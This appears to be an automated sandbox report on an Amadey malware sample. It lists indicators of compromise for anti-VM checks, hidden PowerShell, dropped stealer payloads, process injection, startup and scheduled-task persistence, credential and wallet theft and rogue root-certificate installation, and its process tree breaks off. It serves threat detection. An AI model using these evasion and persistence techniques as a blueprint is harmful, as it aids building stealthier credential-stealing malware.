amadey | d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6324	powershell.exe
7116	powershell.exe
6200	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 9 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	channel2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	runtime.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Nework.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Shipment.pif
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	BowExpert.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	axplong.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url	cmd.exe

Executes dropped EXE 28 IoCs

pid	Process
1840	axplong.exe
5076	crypted.exe
1700	crypteda.exe
3740	TL5gaXPKXp.exe
3256	OfLLdqx0bP.exe
3400	Nework.exe
3264	Hkbsse.exe
4940	stealc_default2.exe
2688	caesium-image-compressor.exe
412	Hkbsse.exe
3404	axplong.exe
2256	BitcoinCore.exe
3004	PureSyncInst.exe
4052	runtime.exe
1588	Shipment.pif
2240	setup.exe
1188	setup.exe
2360	setuptmp.exe
3864	channel2.exe
4576	BowExpert.exe
4900	axplong.exe
1852	Hkbsse.exe
1432	Intake.pif
4392	Channel1.exe
2796	PQP.exe
1768	385107.exe
5736	Install.exe
5816	Install.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Wine	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Wine	axplong.exe

Indirect Command Execution 1 TTPs 6 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
5624	forfiles.exe
3460	forfiles.exe
3984	forfiles.exe
4956	forfiles.exe
6864	forfiles.exe
6808	forfiles.exe

Loads dropped DLL 2 IoCs

pid	Process
4940	stealc_default2.exe
4940	stealc_default2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4372	tasklist.exe
4352	tasklist.exe
1792	tasklist.exe
4080	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
1840	axplong.exe
3404	axplong.exe
2360	setuptmp.exe
4900	axplong.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 5076 set thread context of 4512	5076	crypted.exe	94
PID 1700 set thread context of 4500	1700	crypteda.exe	102
PID 2688 set thread context of 3392	2688	caesium-image-compressor.exe	114
PID 3004 set thread context of 5060	3004	PureSyncInst.exe	145

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bISIDNXXYteSJEZXLD.job	schtasks.exe
File opened for modification	C:\Windows\ConditionSuperintendent	runtime.exe
File created	C:\Windows\Tasks\Hkbsse.job	Nework.exe
File opened for modification	C:\Windows\ProjectionAcademy	runtime.exe
File opened for modification	C:\Windows\ChipSeems	runtime.exe
File opened for modification	C:\Windows\LaboratoriesFriend	runtime.exe
File opened for modification	C:\Windows\AyePercent	runtime.exe
File opened for modification	C:\Windows\CuDefense	runtime.exe
File created	C:\Windows\Tasks\axplong.job	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TL5gaXPKXp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	channel2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OfLLdqx0bP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	runtime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Channel1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BowExpert.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caesium-image-compressor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	385107.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PureSyncInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Intake.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypteda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shipment.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nework.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Channel1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Channel1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	channel2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	channel2.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1656	schtasks.exe
4644	schtasks.exe
6620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
1840	axplong.exe
1840	axplong.exe
3740	TL5gaXPKXp.exe
3740	TL5gaXPKXp.exe
4512	RegAsm.exe
4512	RegAsm.exe
4940	stealc_default2.exe
4940	stealc_default2.exe
4512	RegAsm.exe
4512	RegAsm.exe
4512	RegAsm.exe
4512	RegAsm.exe
3256	OfLLdqx0bP.exe
3256	OfLLdqx0bP.exe
3256	OfLLdqx0bP.exe
3256	OfLLdqx0bP.exe
3256	OfLLdqx0bP.exe
3256	OfLLdqx0bP.exe
4940	stealc_default2.exe
4940	stealc_default2.exe
3404	axplong.exe
3404	axplong.exe
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
2360	setuptmp.exe
2360	setuptmp.exe
2360	setuptmp.exe
2360	setuptmp.exe
2360	setuptmp.exe
2360	setuptmp.exe
4900	axplong.exe
4900	axplong.exe
1432	Intake.pif
1432	Intake.pif

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	3740	TL5gaXPKXp.exe
Token: SeBackupPrivilege	3740	TL5gaXPKXp.exe
Token: SeSecurityPrivilege	3740	TL5gaXPKXp.exe
Token: SeSecurityPrivilege	3740	TL5gaXPKXp.exe
Token: SeSecurityPrivilege	3740	TL5gaXPKXp.exe
Token: SeSecurityPrivilege	3740	TL5gaXPKXp.exe
Token: SeDebugPrivilege	4512	RegAsm.exe
Token: SeDebugPrivilege	3256	OfLLdqx0bP.exe
Token: SeDebugPrivilege	4372	tasklist.exe
Token: SeDebugPrivilege	4352	tasklist.exe
Token: SeDebugPrivilege	1792	tasklist.exe
Token: SeDebugPrivilege	4080	tasklist.exe
Token: SeDebugPrivilege	2796	PQP.exe
Token: SeDebugPrivilege	6324	powershell.exe
Token: SeDebugPrivilege	7116	powershell.exe
Token: SeDebugPrivilege	6200	powershell.exe
Token: SeIncreaseQuotaPrivilege	5576	WMIC.exe
Token: SeSecurityPrivilege	5576	WMIC.exe
Token: SeTakeOwnershipPrivilege	5576	WMIC.exe
Token: SeLoadDriverPrivilege	5576	WMIC.exe
Token: SeSystemProfilePrivilege	5576	WMIC.exe
Token: SeSystemtimePrivilege	5576	WMIC.exe
Token: SeProfSingleProcessPrivilege	5576	WMIC.exe
Token: SeIncBasePriorityPrivilege	5576	WMIC.exe
Token: SeCreatePagefilePrivilege	5576	WMIC.exe
Token: SeBackupPrivilege	5576	WMIC.exe
Token: SeRestorePrivilege	5576	WMIC.exe
Token: SeShutdownPrivilege	5576	WMIC.exe
Token: SeDebugPrivilege	5576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5576	WMIC.exe
Token: SeRemoteShutdownPrivilege	5576	WMIC.exe
Token: SeUndockPrivilege	5576	WMIC.exe
Token: SeManageVolumePrivilege	5576	WMIC.exe
Token: 33	5576	WMIC.exe
Token: 34	5576	WMIC.exe
Token: 35	5576	WMIC.exe
Token: 36	5576	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5576	WMIC.exe
Token: SeSecurityPrivilege	5576	WMIC.exe
Token: SeTakeOwnershipPrivilege	5576	WMIC.exe
Token: SeLoadDriverPrivilege	5576	WMIC.exe
Token: SeSystemProfilePrivilege	5576	WMIC.exe
Token: SeSystemtimePrivilege	5576	WMIC.exe
Token: SeProfSingleProcessPrivilege	5576	WMIC.exe
Token: SeIncBasePriorityPrivilege	5576	WMIC.exe
Token: SeCreatePagefilePrivilege	5576	WMIC.exe
Token: SeBackupPrivilege	5576	WMIC.exe
Token: SeRestorePrivilege	5576	WMIC.exe
Token: SeShutdownPrivilege	5576	WMIC.exe
Token: SeDebugPrivilege	5576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5576	WMIC.exe
Token: SeRemoteShutdownPrivilege	5576	WMIC.exe
Token: SeUndockPrivilege	5576	WMIC.exe
Token: SeManageVolumePrivilege	5576	WMIC.exe
Token: 33	5576	WMIC.exe
Token: 34	5576	WMIC.exe
Token: 35	5576	WMIC.exe
Token: 36	5576	WMIC.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1432	Intake.pif
1432	Intake.pif
1432	Intake.pif

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1588	Shipment.pif
1588	Shipment.pif
1588	Shipment.pif
1432	Intake.pif
1432	Intake.pif
1432	Intake.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4120 wrote to memory of 1840	4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe	90
PID 4120 wrote to memory of 1840	4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe	90
PID 4120 wrote to memory of 1840	4120	d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe	90
PID 1840 wrote to memory of 5076	1840	axplong.exe	92
PID 1840 wrote to memory of 5076	1840	axplong.exe	92
PID 1840 wrote to memory of 5076	1840	axplong.exe	92
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 5076 wrote to memory of 4512	5076	crypted.exe	94
PID 1840 wrote to memory of 1700	1840	axplong.exe	99
PID 1840 wrote to memory of 1700	1840	axplong.exe	99
PID 1840 wrote to memory of 1700	1840	axplong.exe	99
PID 1700 wrote to memory of 4408	1700	crypteda.exe	101
PID 1700 wrote to memory of 4408	1700	crypteda.exe	101
PID 1700 wrote to memory of 4408	1700	crypteda.exe	101
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 1700 wrote to memory of 4500	1700	crypteda.exe	102
PID 4500 wrote to memory of 3740	4500	RegAsm.exe	103
PID 4500 wrote to memory of 3740	4500	RegAsm.exe	103
PID 4500 wrote to memory of 3740	4500	RegAsm.exe	103
PID 4500 wrote to memory of 3256	4500	RegAsm.exe	104
PID 4500 wrote to memory of 3256	4500	RegAsm.exe	104
PID 4500 wrote to memory of 3256	4500	RegAsm.exe	104
PID 1840 wrote to memory of 3400	1840	axplong.exe	106
PID 1840 wrote to memory of 3400	1840	axplong.exe	106
PID 1840 wrote to memory of 3400	1840	axplong.exe	106
PID 3400 wrote to memory of 3264	3400	Nework.exe	107
PID 3400 wrote to memory of 3264	3400	Nework.exe	107
PID 3400 wrote to memory of 3264	3400	Nework.exe	107
PID 1840 wrote to memory of 4940	1840	axplong.exe	109
PID 1840 wrote to memory of 4940	1840	axplong.exe	109
PID 1840 wrote to memory of 4940	1840	axplong.exe	109
PID 1840 wrote to memory of 2688	1840	axplong.exe	112
PID 1840 wrote to memory of 2688	1840	axplong.exe	112
PID 1840 wrote to memory of 2688	1840	axplong.exe	112
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 2688 wrote to memory of 3392	2688	caesium-image-compressor.exe	114
PID 1840 wrote to memory of 2256	1840	axplong.exe	121
PID 1840 wrote to memory of 2256	1840	axplong.exe	121
PID 1840 wrote to memory of 3004	1840	axplong.exe	123
PID 1840 wrote to memory of 3004	1840	axplong.exe	123
PID 1840 wrote to memory of 3004	1840	axplong.exe	123
PID 1840 wrote to memory of 4052	1840	axplong.exe	124
PID 1840 wrote to memory of 4052	1840	axplong.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3444
- C:\Users\Admin\AppData\Local\Temp\d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe
  "C:\Users\Admin\AppData\Local\Temp\d842afaf2ea104f71e952a9ffb81307f5a0ff9ead0b15d445ba9aa7ecdd8557d.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4120
- - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
